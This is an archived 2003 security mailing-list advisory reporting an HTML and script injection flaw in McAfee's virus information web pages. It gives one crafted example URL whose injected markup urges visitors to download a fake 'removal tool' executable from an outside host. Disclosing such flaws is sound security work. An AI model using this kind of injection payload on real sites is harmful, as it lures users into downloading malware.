lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
From: momolly at kryptocrew.de (Redaktion-Kryptocrew) Subject: Code executing in McAfee's virus information websites Vulnerability: Code executing in McAfee's virus information websites Found: 29 Aug 2003 Vendor: McAfee Security Vendor notified: 02 Sept 2003 Vendor response: no Public release: 03 Sept 2003 We were surfing McAfee's virus information sites and possibilities to inject even harmful scripts. We're testing successfully executed remote code using the ADODB exploit. McAfee overlooked this fault in their virus Information websites (all languages!). [Example]: http://de.mcafee.com/virusInfo/default.asp?id=helpCenter&hcName=Sobig<br><br><b>if%20you%20recieve%20a%20error%20above%20you%20must</b><br><h3><a%20href=http://www.kryptocrew.de/badfile.exe>download%20this%20removal%20tool!%20NOW!!!</a><br>testing%20your%20saftey...%20%20test Thanks to: Donnie Werner (exploitlabs.com), Roland Brecht (kryptocrew.de) & Alexander Mueller (ec-security.com) Regards G.P -- ====================================================================== G.P Online-Redaktion =============================== Kryptocrew .: your security advisor team :. mailto:momolly@...ptocrew.de
Powered by blists - more mailing lists